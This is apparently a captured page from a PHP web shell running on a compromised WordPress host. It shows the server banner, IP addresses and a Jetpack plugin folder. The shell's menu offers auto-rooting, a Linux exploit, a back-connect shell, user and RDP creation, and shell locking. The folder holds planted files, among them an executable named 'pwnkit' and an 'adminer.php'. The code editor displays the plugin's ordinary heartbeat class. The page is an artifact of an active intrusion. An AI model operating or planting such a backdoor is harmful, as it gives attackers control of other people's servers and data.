Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.svnignore
151
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
120.31
KB
-rw-r--r--
class.frame-nonce-preview.php
2.18
KB
-rw-r--r--
class.jetpack-admin.php
8.26
KB
-rw-r--r--
class.jetpack-autoupdate.php
6.79
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
2.94
KB
-rw-r--r--
class.jetpack-cli-call.php
25.22
KB
-rw-r--r--
class.jetpack-cli.php
20.53
KB
-rw-r--r--
class.jetpack-client-server.ph...
8.31
KB
-rw-r--r--
class.jetpack-client.php
10.3
KB
-rw-r--r--
class.jetpack-connection-banne...
24.73
KB
-rw-r--r--
class.jetpack-constants.php
2.35
KB
-rw-r--r--
class.jetpack-data.php
4.37
KB
-rw-r--r--
class.jetpack-debugger.php
19.68
KB
-rw-r--r--
class.jetpack-error.php
47
B
-rw-r--r--
class.jetpack-heartbeat.php
4.51
KB
-rw-r--r--
class.jetpack-idc.php
19.76
KB
-rw-r--r--
class.jetpack-ixr-client.php
3.2
KB
-rw-r--r--
class.jetpack-jitm.php
17.71
KB
-rw-r--r--
class.jetpack-modules-list-tab...
11.12
KB
-rw-r--r--
class.jetpack-network-first.ph...
546
B
-rw-r--r--
class.jetpack-network-sites-li...
4.26
KB
-rw-r--r--
class.jetpack-network.php
22.98
KB
-rw-r--r--
class.jetpack-options.php
10.72
KB
-rw-r--r--
class.jetpack-post-images.php
17.62
KB
-rw-r--r--
class.jetpack-signature.php
8.29
KB
-rw-r--r--
class.jetpack-tracks.php
2.87
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
8.84
KB
-rw-r--r--
class.jetpack-user-agent.php
45.94
KB
-rw-r--r--
class.jetpack-xmlrpc-server.ph...
16.02
KB
-rw-r--r--
class.jetpack.php
205.39
KB
-rw-r--r--
class.json-api-endpoints.php
60.81
KB
-rw-r--r--
class.json-api.php
19.27
KB
-rw-r--r--
class.photon.php
33.33
KB
-rw-r--r--
composer.json
345
B
-rw-r--r--
functions.compat.php
2.38
KB
-rw-r--r--
functions.gallery.php
2.26
KB
-rw-r--r--
functions.global.php
260
B
-rw-r--r--
functions.opengraph.php
15.48
KB
-rw-r--r--
functions.photon.php
8.49
KB
-rw-r--r--
jetpack.php
5.72
KB
-rw-r--r--
json-api-config.php
255
B
-rw-r--r--
json-endpoints.php
132.2
KB
-rw-r--r--
locales.php
59.55
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
15.87
KB
-rw-r--r--
require-lib.php
982
B
-rw-r--r--
rest-api.md
6.14
KB
-rw-r--r--
uninstall.php
830
B
-rw-r--r--
webpack.config.js
3.13
KB
-rw-r--r--
wpml-config.xml
213
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.jetpack-heartbeat.php
<?php class Jetpack_Heartbeat { /** * Holds the singleton instance of this class * * @since 2.3.3 * @var Jetpack_Heartbeat */ private static $instance = false; private $cron_name = 'jetpack_v2_heartbeat'; /** * Singleton * * @since 2.3.3 * @static * @return Jetpack_Heartbeat */ public static function init() { if ( ! self::$instance ) { self::$instance = new Jetpack_Heartbeat; } return self::$instance; } /** * Constructor for singleton * * @since 2.3.3 * @return Jetpack_Heartbeat */ private function __construct() { if ( ! Jetpack::is_active() ) return; // Schedule the task add_action( $this->cron_name, array( $this, 'cron_exec' ) ); if ( ! wp_next_scheduled( $this->cron_name ) ) { // Deal with the old pre-3.0 weekly one. if ( $timestamp = wp_next_scheduled( 'jetpack_heartbeat' ) ) { wp_unschedule_event( $timestamp, 'jetpack_heartbeat' ); } wp_schedule_event( time(), 'daily', $this->cron_name ); } add_filter( 'jetpack_xmlrpc_methods', array( __CLASS__, 'jetpack_xmlrpc_methods' ) ); } /** * Method that gets executed on the wp-cron call * * @since 2.3.3 * @global string $wp_version */ public function cron_exec() { $jetpack = Jetpack::init(); /* * This should run daily. Figuring in for variances in * WP_CRON, don't let it run more than every 23 hours at most. * * i.e. if it ran less than 23 hours ago, fail out. */ $last = (int) Jetpack_Options::get_option( 'last_heartbeat' ); if ( $last && ( $last + DAY_IN_SECONDS - HOUR_IN_SECONDS > time() ) ) { return; } /* * Check for an identity crisis * * If one exists: * - Bump stat for ID crisis * - Email site admin about potential ID crisis */ // Coming Soon! foreach ( self::generate_stats_array( 'v2-' ) as $key => $value ) { $jetpack->stat( $key, $value ); } Jetpack_Options::update_option( 'last_heartbeat', time() ); $jetpack->do_stats( 'server_side' ); /** * Fires when we synchronize all registered options on heartbeat. * * @since 3.3.0 */ do_action( 'jetpack_heartbeat' ); } public static function generate_stats_array( $prefix = '' ) { $return = array(); $return["{$prefix}version"] = JETPACK__VERSION; $return["{$prefix}wp-version"] = get_bloginfo( 'version' ); $return["{$prefix}php-version"] = PHP_VERSION; $return["{$prefix}branch"] = floatval( JETPACK__VERSION ); $return["{$prefix}wp-branch"] = floatval( get_bloginfo( 'version' ) ); $return["{$prefix}php-branch"] = floatval( PHP_VERSION ); $return["{$prefix}public"] = Jetpack_Options::get_option( 'public' ); $return["{$prefix}ssl"] = Jetpack::permit_ssl(); $return["{$prefix}is-https"] = is_ssl() ? 'https' : 'http'; $return["{$prefix}language"] = get_bloginfo( 'language' ); $return["{$prefix}charset"] = get_bloginfo( 'charset' ); $return["{$prefix}is-multisite"] = is_multisite() ? 'multisite' : 'singlesite'; $return["{$prefix}identitycrisis"] = Jetpack::check_identity_crisis() ? 'yes' : 'no'; $return["{$prefix}plugins"] = implode( ',', Jetpack::get_active_plugins() ); $return["{$prefix}manage-enabled"] = Jetpack::is_module_active( 'manage' ); // is-multi-network can have three values, `single-site`, `single-network`, and `multi-network` $return["{$prefix}is-multi-network"] = 'single-site'; if ( is_multisite() ) { $return["{$prefix}is-multi-network"] = Jetpack::is_multi_network() ? 'multi-network' : 'single-network'; } if ( ! empty( $_SERVER['SERVER_ADDR'] ) || ! empty( $_SERVER['LOCAL_ADDR'] ) ) { $ip = ! empty( $_SERVER['SERVER_ADDR'] ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['LOCAL_ADDR']; $ip_arr = array_map( 'intval', explode( '.', $ip ) ); if ( 4 == count( $ip_arr ) ) { $return["{$prefix}ip-2-octets"] = implode( '.', array_slice( $ip_arr, 0, 2 ) ); } } foreach ( Jetpack::get_available_modules() as $slug ) { $return["{$prefix}module-{$slug}"] = Jetpack::is_module_active( $slug ) ? 'on' : 'off'; } return $return; } public static function jetpack_xmlrpc_methods( $methods ) { $methods['jetpack.getHeartbeatData'] = array( __CLASS__, 'generate_stats_array' ); return $methods; } public function deactivate() { // Deal with the old pre-3.0 weekly one. if ( $timestamp = wp_next_scheduled( 'jetpack_heartbeat' ) ) { wp_unschedule_event( $timestamp, 'jetpack_heartbeat' ); } $timestamp = wp_next_scheduled( $this->cron_name ); wp_unschedule_event( $timestamp, $this->cron_name ); } }
Close